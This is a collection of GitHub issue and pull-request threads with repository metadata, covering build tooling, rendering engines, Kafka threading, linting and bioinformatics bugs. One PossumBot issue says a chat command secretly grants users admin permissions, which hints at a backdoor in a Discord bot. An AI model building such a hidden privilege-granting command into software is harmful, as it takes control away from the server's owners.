Attributes added, columns rearranged to resemble file browser order per request of klearned. Current debate: leave all eleven columns, remove other items, or consolidate information?
|
2025-04-01T06:36:45.822007
| 2017-05-08T20:57:35
|
227172261
|
{
"authors": [
"arkal",
"cket",
"ejacox"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:397",
"repo": "BD2KGenomics/toil",
"url": "https://github.com/BD2KGenomics/toil/pull/1669"
}
|
gharchive/pull-request
|
Use chunked transfer in AWS job store importing
Resolves #1515
@cket i tested this branch and it still raised the [Errno 104] Connection reset by peer Exception
Thanks @arkal for testing these changes as well!
The 10 Gb import/export test was removed and will be added as an issue.
|
2025-04-01T06:36:45.964517
| 2020-08-28T10:53:48
|
687990276
|
{
"authors": [
"iamrajiv"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:398",
"repo": "BITSoC/EmotionRecog",
"url": "https://github.com/BITSoC/EmotionRecog/pull/24"
}
|
gharchive/pull-request
|
added black and flake8 linters
The black code formatter in Python is an opinionated tool that formats your code in the best way possible and Flake8 is a powerful tool that checks our code’s compliance to PEP8. This will format and enhance the code quality whenever there is a PR in the repository or any changes done to .py file.
Fixes: #22
@RC99 I am participating through BITSoC. Please review.
|
2025-04-01T06:36:46.029086
| 2017-11-06T06:14:05
|
271369241
|
{
"authors": [
"tfabraham"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:400",
"repo": "BTDF/DeploymentFramework",
"url": "https://github.com/BTDF/DeploymentFramework/issues/90"
}
|
gharchive/issue
|
ItemGroupFromSeparatedList build task should accept an empty string and return an empty ItemGroup
ItemGroupFromSeparatedList build task should accept an empty string and return an empty ItemGroup
This work item was migrated from CodePlex
CodePlex work item ID: '6054'
Assigned to: 'tfabraham'
Vote count: '0'
[UnknownUser@2/18/2010]
Resolved with changeset 36776.
[UnknownUser@2/21/2013]
[UnknownUser@5/16/2013]
|
2025-04-01T06:36:46.045119
| 2017-11-06T06:25:00
|
271370907
|
{
"authors": [
"tfabraham"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:401",
"repo": "BTDF/DeploymentFramework",
"url": "https://github.com/BTDF/DeploymentFramework/issues/98"
}
|
gharchive/issue
|
Feature: Add Knowledge of Inter-Application Dependency Stack
If application B relies on A, B has to be undeployed to redeploy A (for example B uses schemas contained in A). It would really be cool if this "stack" could be defined in BTDF. So if I'm fixing something in project A, B has to be undeployed, A has to be redeployed, then B has to be redployed. This would be a feature only for the development environment.
For the QA/production environment MSI install, a super-deploy of multiple MSI's in the proper order would also be very nice. Most applications that I've worked with are 5 to 25 inter-related applications with dependencies. BTDF still is very helpful. At one client, we had a spreadsheet of about 25 BT applications to deploy, and the proper order. There was still a large chance the the admins would mess up the deploy if they were not careful.
This work item was migrated from CodePlex
CodePlex work item ID: '6130'
Vote count: '5'
[giuliov@3/9/2010]
I addressed this with a Powershell deploy script that works at a higher-level, and I think that is a more generic approach: in my script I take care of other pieces outside the BTS applications.
[tfabraham@3/9/2010]
I also believe that this belongs in a layer that exists above the individual solutions that use the Deployment Framework. A meta-script that understands the dependencies and drives all of the individual solution deploy/undeploy cycles across multiple servers. I do think that such a script can become part of the Deployment Framework package, just not a "core" component of the Framework itself.
[UnknownUser@3/11/2010]
[Rokhead@3/11/2010]
I could see where this would be useful. Right now, it is a matter of the developer just "knowing" the stack, i.e. Install A, then B, then C. Uninstall in reverse, C then B, then A.
[UnknownUser@5/18/2010]
[UnknownUser@6/7/2011]
[fkuiper@8/26/2011]
I've written a MsBuild script that does exactly what is in the description. It utilizes the targets 'DependsOn' attributes to maintain the stack so I've created a target for each package. Well actually I've create three targets for each package: PackageA, PacakageA_Remove and PackageA_Add. The first target is dependent on the last two:
PackageA --> dependson="PackageA_Remove;PackageA_Add"
If you add PackageB that relies on PackageA you also create the same three targets, but now you add two extra target dependencies:
PackageA_Remove --> dependson="PackageB_Remove"
PackageB_Add --> dependson="PackageA_Add"
The cool thing is that you know let MsBuild figure out in which order your packages need to be undeployed and deployed. If you have a stack of 25 packages and you need to add a new one you don't have to rearrange you whole script (as we used to do) but let MsBuild figure it out run time... as long as you have your dependencies in place.
[UnknownUser@10/20/2011]
[charliemott@11/14/2012]
This functionality will be provided within the BizTalk Administration Console in BizTalk 2013. See here: http://adventuresinsidethemessagebox.wordpress.com/2012/11/07/biztalk-2013-beta-new-features-dependency-modelling-in-the-administration-console/
[UnknownUser@2/21/2013]
[sandernefs@5/10/2013]
Hi Ferdinand,
I believe you mean that you use MSBuild to figure out the dependencies and that you only need some sort of 'config' file, which would make life a lot easier.
Are you willing to share this script here as well?
Regards,
Sander
[fkuiper@5/17/2013]
Hi Sander,
I unfortunately can't share the entire script here (there is to much business information in it), but I can share some highlights :)
What I've done is I've written a MSBuild target file containing 4 targets:
Install feature
Deploy feature
Uninstall feature
Undeploy feature
(a feature in this context is one BTDF-msi by the way)
The install feature target looks something like this:
<Target Name="InstallFeature">
<Message Text="Installing '$(FeatureName)'..." />
<!-- Install and copy MSI to install dir -->
<Exec Command="msiexec /i "$(FeatureName)-1.0.0.msi" /passive" WorkingDirectory="..\Packages" />
<CreateItem Include="..\Packages\$(FeatureName)-1.0.0.msi">
<Output ItemName="MsiToCopy" TaskParameter="Include" />
</CreateItem>
<Copy SourceFiles="@(MsiToCopy)" DestinationFiles="@(MsiToCopy->'c:\Program Files (x86)\$(FeatureName) for BizTalk\%(FileName)%(Extension)')" />
</Target>
And the Deploy feature something like this:
<Target Name="DeployFeature">
<!-- Start deployment -->
<Exec
Command=".\Framework\DeployTools\EnvironmentSettingsExporter.exe EnvironmentSettings\SettingsFileGenerator.xml EnvironmentSettings"
WorkingDirectory="c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\"
Condition="Exists('c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\EnvironmentSettings\SettingsFileGenerator.xml')"
/>
<MsBuild
Projects="c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\$(FeatureName).Deployment.btdfproj"
Properties="DeployBizTalkMgmtDB=$(BT_DEPLOY_MGMT_DB);Configuration=Server;SkipUndeploy=true;ENV_SETTINGS=c:\Program Files (x86)\$(FeatureName) for BizTalk\1.0\Deployment\$(ENV_SETTINGS_MASK)"
/>
</Target>
Uninstall and undeploy are very simular in setup.
Ofcourse these target in itself will not do anything. There are more scripts. One is the 'main'-project file which will import all 'features' and contain the main targets 'Deploy' and 'Undeploy'
<Import Project="Deployment.Targets" />
<Import Project="Feature.ApplicationA.config" />
<Import Project="Feature.ApplicationB.config" />
<!-- Deploy alle packages -->
<Target Name="Deploy">
<CallTarget Targets="@(BizTalkApplication->'%(Identity)_Add')" />
</Target>
<!-- Undeploy alle packages -->
<Target Name="Undeploy">
<CallTarget Targets="@(BizTalkApplication->'%(Identity)_Remove')" />
</Target>
Last but not least there are the "feature config's" and that's where most of the magic happens:
<ItemGroup>
<BizTalkApplication Include="ApplicationA"/>
</ItemGroup>
<Target Name="ApplicationA_Add" DependsOnTargets="">
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="InstallFeature"
Properties="FeatureName=ApplicationA"
/>
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="DeployFeature"
Properties="FeatureName=ApplicationA"
/>
</Target>
<Target Name="ApplicationA_Remove" DependsOnTargets="">
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="UndeployFeature"
Properties="FeatureName=ApplicationA"
/>
<MsBuild
Projects="$(MSBuildProjectFile)"
Targets="UninstallFeature"
Properties="FeatureName=ApplicationA"
/>
</Target>
The config for feature B contains exactly the same as the above, but ofcourse you have to replace ApplicationA with ApplicationB. When you start the main msbuild file and call target "Deploy" all the features are installed and deployed and removed in sequence. Now for the magic to happen you can use the "DependsOn" attribute for the "ApplicationA_Add" target like this:
<Target Name="ApplicationA_Add" DependsOnTargets="ApplicationB_Add">
...
</Target>
Ofcourse you have to add the same dependancy to feature B when removing it, like this:
<Target Name="ApplicationB_Remove" DependsOnTargets="ApplicationA_Remove">
...
</Target>
With this setting ApplicationB will allway be installed and deployed BEFORE ApplicationA and ApplicationA will allways be remove BEFORE ApplicationB.
And that's how I've solved the dependancy tree problem for our 27 (or so) individual BTDF-msi's.
Hope this will be helpfull to you.
Kind Regards,
Ferdinand.
[UnknownUser@10/14/2013]
|
2025-04-01T06:36:46.052772
| 2021-09-13T05:56:45
|
994484487
|
{
"authors": [
"cwfitzgerald"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:402",
"repo": "BVE-Reborn/rend3",
"url": "https://github.com/BVE-Reborn/rend3/issues/188"
}
|
gharchive/issue
|
Ambient Lighting Support Removed
Was erroneously removed during the renderlist rewrite, needs to be part of the pbr render list.
@JohnNagle Published in rend3-pbr 0.1.1
|
2025-04-01T06:36:46.072801
| 2023-07-05T21:46:01
|
1790397403
|
{
"authors": [
"J-Ogden99",
"msouff"
],
"license": "BSD-3-Clause",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:403",
"repo": "BYU-Hydroinformatics/geoglows-rest-api",
"url": "https://github.com/BYU-Hydroinformatics/geoglows-rest-api/pull/18"
}
|
gharchive/pull-request
|
Add CloudWatch Logging
Added function that will write a log containing information about query parameters to AWS CloudWatch. Requires an AWS client to be present in the environment that can be accessed with boto3, as well as environment variables AWS_LOG_GROUP_NAME and AWS_LOG_STREAM_NAME. The values I have been using for these are 'data-service-queries-group' and 'data-service-queries-stream', respectively, but something like 'geoglows-service-queries-*' may be more appropriate, that is open for discussion.
@rileyhales @msouff
Hi @J-Ogden99
I'm merging your cloudwatch-logging branch directly into the branch I'm currently working on so I'll close this PR.
|
2025-04-01T06:36:46.075045
| 2021-01-04T23:35:16
|
778449775
|
{
"authors": [
"PolygonalSun",
"deltakosh"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:404",
"repo": "BabylonJS/Babylon.js",
"url": "https://github.com/BabylonJS/Babylon.js/issues/9738"
}
|
gharchive/issue
|
Add PS5 DualSense support to Babylon.js
Once the DualSense gamepad is fully supported by PC and web, support for it should be added to Babylon.js' input systems.
@PolygonalSun can we close it??
@PolygonalSun can we close it??
None of the work for this has been merged into master but if we're fine with adding it now, I can have a PR up with a day or so. It only required a new button enum, value in the DeviceType enum, and updated detection logic (one additional line of code?).
Yes let's do it!
|
2025-04-01T06:36:46.086120
| 2024-04-17T15:05:54
|
2248527097
|
{
"authors": [
"RaananW",
"bjsplat"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:405",
"repo": "BabylonJS/Babylon.js",
"url": "https://github.com/BabylonJS/Babylon.js/pull/14996"
}
|
gharchive/pull-request
|
Allow shader precompile by dividing effect and thinEngine
This PR presents a few changes to Effect and ThinEngine architecture to allow shader precompilation before an engine is constructed.
Using the following ode will allow you to generate create a (WebGL) Pipeline context using an existing context. While this is running you can do any other async tasks, like loading the Engine and its dependencies.
Note - the shader is being cached, so it will not be recompiled even if Babylon requests it. The important part is maintaining the generated shader name so that when an effect is created based on the shader code it will take the compiled shader from cache.
This code will precompile a provided shader:
import { generatePipelineContext } from<EMAIL_ADDRESS>import { _preparePipelineContext, _stateObject, createPipelineContext } from<EMAIL_ADDRESS>
export async function compileShader(
id: string,
context: WebGL2RenderingContext | WebGLRenderingContext,
options: {
vertex: string;
fragment: string;
},
): Promise<void> {
await generatePipelineContext(
{
shaderNameOrContent: {
vertexSource: options.vertex,
fragmentSource: options.fragment,
},
key: id,
},
context,
createPipelineContext,
_preparePipelineContext,
);
}
Of course it can be a little more complex than that. It is technically possible to "serialize" existing shaders and then pre-load them. Having said that, precompiling the standard shader(s) might be a bit challenging, depending on many different factors.
Please make sure to label your PR with "bug", "new feature" or "breaking change" label(s).
To prevent this PR from going to the changelog marked it with the "skip changelog" label.
WebGL2 visualization test reporter:
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl2playwright/index.html
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
Visualization tests for WebGL 1 have failed. If some tests failed because the snapshots do not match, the report can be found at
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl1/index.html
If tests were successful afterwards, this report might not be available anymore.
Visualization tests for WebGL 1 have failed. If some tests failed because the snapshots do not match, the report can be found at
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl1/index.html
If tests were successful afterwards, this report might not be available anymore.
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
WebGL2 visualization test reporter:
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgl2playwright/index.html
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
Visualization tests for WebGPU (Experimental)
Important - these might fail sporadically. This is an optional test.
https://babylonsnapshots.z22.web.core.windows.net/refs/pull/14996/merge/testResults/webgpuplaywright/index.html
LGTM, I think the only issue is the activeRequests that should stay attached to one engine and therefore not set in PreCompile case
Moved activerequests back to the engine. if someone use the .functions function they will need to deal with disposing the requests themselves
Discussed with @sebavan , merging this (dismissing his review)
|
2025-04-01T06:36:46.115243
| 2018-05-16T12:09:48
|
323592664
|
{
"authors": [
"Bajdzis",
"mleopold"
],
"license": "mit",
"license_source": "bigquery",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:406",
"repo": "Bajdzis/vscode-database",
"url": "https://github.com/Bajdzis/vscode-database/issues/47"
}
|
gharchive/issue
|
FR: SSL authentication (mysql)
Hi,
I would like to propose support for authenticating via ssl (corresponding to the following command line arguments of the mysql client: --ssl-ca --ssl-cert --ssl-key).
Martin
I think the feature is worked in 2.0.1 version. Could you check if everything works?
@mleopold
|
2025-04-01T06:36:46.120853
| 2023-01-07T20:40:12
|
1524135710
|
{
"authors": [
"Bam92",
"martinyis"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:407",
"repo": "Bam92/attendancy-gda",
"url": "https://github.com/Bam92/attendancy-gda/issues/102"
}
|
gharchive/issue
|
Validate user input with express-validator or joi
https://developer.mozilla.org/en-US/docs/Learn/Server-side/Express_Nodejs/forms
I would like try to solve this issue, but could you tell me which form you need to validate(file path)
Hello @martinyis,
Thank you for interest on this issue. The idea here is to validate user inputs in general. E.g.: login, add user... You can find forms in the views directory. You can also find the corresponding controllers in the controller folder.
Are you able to set up the project?
My preference is express-validator, but feel free to chose what you want https://www.freecodecamp.org/news/how-to-choose-which-validator-to-use-a-comparison-between-joi-express-validator-ac0b910c1a8c/
|
2025-04-01T06:36:46.128278
| 2024-02-28T14:20:58
|
2159083133
|
{
"authors": [
"mmills6060"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:408",
"repo": "Banbury-inc/Athena",
"url": "https://github.com/Banbury-inc/Athena/issues/12"
}
|
gharchive/issue
|
allow ability to upload files
need to be able to press the upload button and have it do something
completed
|
2025-04-01T06:36:46.155011
| 2020-04-08T18:26:29
|
596771555
|
{
"authors": [
"coacoas",
"isomarcte"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:409",
"repo": "Banno/kafka4s",
"url": "https://github.com/Banno/kafka4s/pull/179"
}
|
gharchive/pull-request
|
Update Threading Semantics
This commit makes a few changes related to the threading setup in ConsumerApi and ProducerApi.
It addresses unclean shutdown of the java.util.concurrent.ExecutorService as well as fixing a potential deadlock scenario.
Prior to this commit an ExecutorService with a single thread was created in ConsumerApi.BlockingContext. For blocking IO operations an unbounded thread pool is recommended (https://typelevel.org/cats-effect/concurrency/basics.html#choosing-thread-pool). Preventing unbounded resource usage is the responsibility for calling code running on a bounded thread pool.
This commit also updates the ThreadFactory so that if multiple pools happen to be created, they will be given globally unique names.
Two new methods are added to the companion object of ConsumerApi to allow for the caller to provider their own Blocker if so desired.
Also, the shutdown of the thread pool prior to this commit only called (es: ExecutorService).shutdown(). This is not sufficient to shutdown an ExecutorService. The full process is actually quite involved (https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/util/concurrent/ExecutorService.html). Thankfully cats-effect already provides this logic for us out of the box with Blocker.fromExecutorService.
Both the single threaded nature of the blocker and the shutdown semantics were issues. The impetus for this commit is that we were experiencing a deadlock around shutdown/restart of a fs2.Stream with Kafka4s related code. I strongly believe that one or both of these is the source of that issue, however even if it is not, these items should still be addressed.
This is a binary incompatible change.
@isomarcte Build failed:
The command "sbt ++$TRAVIS_SCALA_VERSION "scalafmtSbtCheck;scalafmtCheckAll"" exited with 1.
@isomarcte Is this still under development? There is now a conflict if we are still looking at this.
I think we are considering other approaches now. So I'll close this.
|
2025-04-01T06:36:46.185538
| 2024-03-25T13:56:08
|
2205826478
|
{
"authors": [
"Baroshem",
"danielroe"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:414",
"repo": "Baroshem/nuxt-security",
"url": "https://github.com/Baroshem/nuxt-security/pull/406"
}
|
gharchive/pull-request
|
fix: opt in to import.meta.* properties
Types of changes
[x] Bug fix (a non-breaking change which fixes an issue)
[ ] New feature (a non-breaking change which adds functionality)
[ ] Breaking change (fix or feature that would cause existing functionality to change)
Description
This is a very early PR to make this module compatible with changes we expect to release in Nuxt v5.
In Nuxt v3.7.0 we added support for import.meta.* (see original PR) and we've been gradually updating docs and moving across from the old process.* patterned variables.
As I'm sure you're aware, these variables are replaced at build-time and enable tree-shaking in bundled code.
This change affects runtime code (that is, that is processed by the Nuxt bundler, like vite or webpack) rather than code running in Node. So it really doesn't matter what the string is, but it makes more sense in an ESM-world to use import.meta rather than process.
(It might be worth updating the module compatibility as well to indicate it needs to have Nuxt v3.7.0+, but I'll leave that with you if you think this is a good approach.)
Checklist:
[ ] My change requires a change to the documentation.
[ ] I have updated the documentation accordingly.
[ ] I have added tests to cover my changes (if not applicable, please state why)
Hey @danielroe
Thank you si much for this PR! I will merge it alongside other features and fixes for 1.3.0 version ;)
|
2025-04-01T06:36:46.313476
| 2021-03-12T03:23:41
|
829721424
|
{
"authors": [
"Barsik008",
"ManobsTheChobs"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:415",
"repo": "Barsik008/PossumBot",
"url": "https://github.com/Barsik008/PossumBot/issues/98"
}
|
gharchive/issue
|
!myakish doesn't work
When I type in !myakish it doesn't kick anyone out
@ManobsTheChobs it's supposed to give you admin perms.
|
2025-04-01T06:36:46.327582
| 2024-11-05T23:16:50
|
2636691494
|
{
"authors": [
"DataM0del"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:416",
"repo": "BasedInc/libhat",
"url": "https://github.com/BasedInc/libhat/issues/24"
}
|
gharchive/issue
|
Rust bindings
Just use rust-lang/rust-bindgen?
Also, Rust rewrite when??? (not happening lol but yes)
I'm doing this.
|
2025-04-01T06:36:46.405558
| 2021-01-11T20:44:06
|
783690866
|
{
"authors": [
"NoahGorny",
"marcospereira"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:417",
"repo": "Bash-it/bash-it",
"url": "https://github.com/Bash-it/bash-it/pull/1785"
}
|
gharchive/pull-request
|
Add themes/base.theme.bash to clean files
Description
Review with ?w=1.
Add themes/base.theme.bash to clean files
Run code fomatter for themes/base.theme.bash
Fix shellcheck warnings for themes/base.theme.bash
Fix shellcheck header script to consider multiple lines
Motivation and Context
I've picked this file because it is the file with most changes (commits, at least) based on:
git log --name-only --pretty="format:" | grep -v -e "^[[:space:]]*$" | sort | uniq -c | sort
I thought about adding other files, but that would probably make it harder to review.
How Has This Been Tested?
Besides running the bats tests locally, I've manually tested that the most significant in isolation (checking they are resulting in the same effect as before).
Screenshots (if appropriate):
Types of changes
[ ] Bug fix (non-breaking change which fixes an issue)
[ ] New feature (non-breaking change which adds functionality)
[ ] Breaking change (fix or feature that would cause existing functionality to change)
[ ] File linting
Checklist:
[x] My code follows the code style of this project.
[x] If my change requires a change to the documentation, I have updated the documentation accordingly.
[x] I have read the CONTRIBUTING document.
[x] If I have added a new file, I also added it to clean_files.txt and formatted it using lint_clean_files.sh.
[x] I have added tests to cover my changes, and all the new and existing tests pass.
Thanks for reviewing, @NoahGorny and @davidpfarrell. I've removed the changes in dots-bash.sh.
Thanks for reviewing, @NoahGorny and @davidpfarrell. I've removed the changes in dots-bash.sh.
Thanks, @NoahGorny. So, I can invest some more time in this cleanup task, but perhaps just prioritizing files that have many changes isn't the better way to do it, right?
Are there any specific areas where you think it would be more relevant now?
Thanks, @NoahGorny. So, I can invest some more time in this cleanup task, but perhaps just prioritizing files that have many changes isn't the better way to do it, right?
Are there any specific areas where you think it would be more relevant now?
Thanks, @NoahGorny. So, I can invest some more time in this cleanup task, but perhaps just prioritizing files that have many changes isn't the better way to do it, right?
Are there any specific areas where you think it would be more relevant now?
I think that going after the core files, like the file you fixed here, is a great idea. Just make sure there is no pending PRs for the file, and lint away :smile:
For hints, I think bash_it.sh is a challenging file worth cleaning up, also the lib directory contains important files.
Thank you for doing this @marcospereira !
Thanks, @NoahGorny. So, I can invest some more time in this cleanup task, but perhaps just prioritizing files that have many changes isn't the better way to do it, right?
Are there any specific areas where you think it would be more relevant now?
I think that going after the core files, like the file you fixed here, is a great idea. Just make sure there is no pending PRs for the file, and lint away :smile:
For hints, I think bash_it.sh is a challenging file worth cleaning up, also the lib directory contains important files.
Thank you for doing this @marcospereira !
|
2025-04-01T06:36:46.410443
| 2024-06-24T14:44:44
|
2370442035
|
{
"authors": [
"armsteadj1",
"bt-platform-eng"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:418",
"repo": "Basis-Theory/developers.basistheory.com",
"url": "https://github.com/Basis-Theory/developers.basistheory.com/pull/403"
}
|
gharchive/pull-request
|
fix: adding information about delay it tokens in list and search
Description
Documenting the slight delay in tokens availability in listing and search
Testing required outside of automated testing?
[ ] Not Applicable
Screenshots (if appropriate):
[ ] Not Applicable
Rollback / Rollforward Procedure
[ ] Roll Forward
[ ] Roll Back
Reviewer Checklist
[ ] Description of Change
[ ] Description of outside testing if applicable.
[ ] Description of Roll Forward / Backward Procedure
[ ] Documentation updated for Change
:tada: This PR is included in version 1.160.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
2025-04-01T06:36:46.413027
| 2018-11-14T11:25:58
|
380654663
|
{
"authors": [
"BastiaanOlij"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:419",
"repo": "BastiaanOlij/gdprocmesh",
"url": "https://github.com/BastiaanOlij/gdprocmesh/pull/25"
}
|
gharchive/pull-request
|
Adding Fast Quadric Mesh Simplification support
Working on implementing this really cool piece of tech:
https://github.com/sp4cerat/Fast-Quadric-Mesh-Simplification
This takes in a mesh, optimizes the vertices and faces to a reduction factor and gives you a resulting mesh.
Note that due to the way meshes are loaded into Godot multi material meshes will always have seam issues. But in combination with game optimization turning a mesh into a single material mesh with all textures baked into one this will be a powerful automatic LOD tool.
Lots of work left to be done. Need to remove duplicate vertices to solve seam issues. Have to add texture coordinates, etc.
UVs and seams work fine now, last thing to do is normals :)
OK I have normals and tangents working though tangents seem inverted somehow (or maybe they are wrong on the source object). I think it's time to merge this
|
2025-04-01T06:36:46.458464
| 2023-09-07T07:22:58
|
1885271953
|
{
"authors": [
"joaoufrj",
"sezginerr"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:420",
"repo": "BayraktarLab/cell2fate",
"url": "https://github.com/BayraktarLab/cell2fate/issues/7"
}
|
gharchive/issue
|
Can't export the model posterior to the anndata object
Hi,
I am running cell2fate on a M1 MBP and as you know NVIDIA GPU, CUDA with Pytorch will not work in ARM Macs. I can train the model [mod.train()], the following message appears:
GPU available: False, used: False
TPU available: False, using: 0 TPU cores
IPU available: False, using: 0 IPUs
But when I export the model posterior to the anndata object with adata = mod.export_posterior(adata), I get the following issue:
AssertionError Traceback (most recent call last)
Cell In[17], line 1
----> 1 adata = mod.export_posterior(adata)
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/cell2fate/_cell2fate_DynamicalModel.py:290, in Cell2fate_DynamicalModel.export_posterior(self, adata, sample_kwargs, export_slot, full_velocity_posterior, normalize)
286 sample_kwargs['batch_size'] = adata.n_obs
288 # generate samples from posterior distributions for all parameters
289 # and compute mean, 5%/95% quantiles and standard deviation
--> 290 self.samples = self.sample_posterior(**sample_kwargs)
292 # export posterior distribution summary for all parameters and
293 # annotation (model, date, var, obs and cell type names) to anndata object
294 adata.uns[export_slot] = self._export2adata(self.samples)
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/scvi/model/base/_pyromixin.py:483, in PyroSampleMixin.sample_posterior(self, num_samples, return_sites, use_gpu, batch_size, return_observed, return_samples, summary_fun)
436 """
437 Summarise posterior distribution.
438
(...)
480 to keep all model-specific variables in one place.
481 """
482 # sample using minibatches (if full data, data is moved to GPU only once anyway)
--> 483 samples = self._posterior_samples_minibatch(
484 use_gpu=use_gpu,
485 batch_size=batch_size,
486 num_samples=num_samples,
487 return_sites=return_sites,
488 return_observed=return_observed,
489 )
491 param_names = list(samples.keys())
492 results = dict()
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/cell2fate/_cell2fate_DynamicalModel.py:796, in Cell2fate_DynamicalModel._posterior_samples_minibatch(self, use_gpu, batch_size, **sample_kwargs)
779 """
780 Temporary solution for batch sampling problem.
781
(...)
792 dictionary {variable_name: [array with samples in 0 dimension]}
793 """
794 samples = dict()
--> 796 _, device = parse_use_gpu_arg(use_gpu)
798 batch_size = batch_size if batch_size is not None else settings.batch_size
800 train_dl = AnnDataLoader(
801 self.adata_manager, shuffle=False, batch_size=batch_size
802 )
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/scvi/model/_utils.py:40, in parse_use_gpu_arg(use_gpu, return_device)
38 device = torch.device("cpu")
39 elif (use_gpu is None and gpu_available) or (use_gpu is True):
---> 40 current = torch.cuda.current_device()
41 device = torch.device(current)
42 gpus = [current]
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/torch/cuda/init.py:481, in current_device()
479 def current_device() -> int:
480 r"""Returns the index of a currently selected device."""
--> 481 _lazy_init()
482 return torch._C._cuda_getDevice()
File ~/opt/anaconda3/envs/cell2fate_env/lib/python3.9/site-packages/torch/cuda/init.py:210, in _lazy_init()
206 raise RuntimeError(
207 "Cannot re-initialize CUDA in forked subprocess. To use CUDA with "
208 "multiprocessing, you must use the 'spawn' start method")
209 if not hasattr(torch._C, '_cuda_getDeviceCount'):
--> 210 raise AssertionError("Torch not compiled with CUDA enabled")
211 if _cudart is None:
212 raise AssertionError(
213 "libcudart functions unavailable. It looks like you have a broken build?")
AssertionError: Torch not compiled with CUDA enabled
Looks like I could edit some of the functions to not expect the usage of CUDA, but I am not sure where that should be done. If you could please help me, I would love to be able to use this package in my data. Thanks!
Hello @joaoufrj,
Could you please try setting the use_gpu argument to False in the sample_kwargs as follows:
sample_kwarg = {"num_samples": 20, "batch_size" : 2000,
"use_gpu" : False, 'return_samples': True}
adata = mod.export_posterior(adata, sample_kwargs=sample_kwarg)
With this change, you should be able to export posteriors without using CUDA.
|
2025-04-01T06:36:46.479381
| 2022-09-12T10:04:08
|
1369610660
|
{
"authors": [
"YaoZY157",
"masoodlab"
],
"license": "Apache-2.0",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:421",
"repo": "BayraktarLab/cell2location",
"url": "https://github.com/BayraktarLab/cell2location/issues/199"
}
|
gharchive/issue
|
AttributeError: module 'cell2location' has no attribute 'run_cell2location'
[x] I have confirmed this bug exists on the latest version of cell2location. See https://github.com/BayraktarLab/cell2location#installation
[ ] I follow the instructions from the scvi-tools tutorial.
Note: Please read this guide detailing how to provide the necessary information for us to reproduce your bug.
Minimal code sample (that we can run without your data, using public data)
Hi,guys!
When I run the official process ( https://cell2location.readthedocs.io/en/latest/notebooks/cell2location_short_demo.html),
I meet the trouble: AttributeError: module 'cell2location' has no attribute 'run_cell2location'.
I install it according to the official website(https://github.com/BayraktarLab/cell2location).
import sys
import scanpy as sc
import anndata
import pandas as pd
import numpy as np
import os
import gc
import cell2location
import matplotlib as mpl
from matplotlib import rcParams
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.filterwarnings('ignore')
#The official website process has been omitted( https://cell2location.readthedocs.io/en/latest/notebooks/cell2location_short_demo.html)
